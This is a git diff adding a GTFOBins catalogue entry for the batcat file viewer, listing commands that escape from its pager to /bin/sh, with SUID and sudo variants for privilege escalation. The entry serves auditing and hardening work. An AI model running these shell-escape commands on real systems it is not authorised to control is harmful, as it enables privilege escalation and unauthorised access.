diff --git a/_gtfobins/batcat.md b/_gtfobins/batcat.md new file mode 100644 index 0000000..e666142 --- /dev/null +++ b/_gtfobins/batcat.md @@ -0,0 +1,16 @@ +--- +description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. `--paging always` can be omitted provided that the output doesn't fit the screen. +functions: + shell: + - code: | + batcat --paging always /etc/profile + !/bin/sh + suid-limited: + - code: | + ./batcat --paging always /etc/profile + !/bin/sh + sudo: + - code: | + sudo batcat --paging always /etc/profile + !/bin/sh +---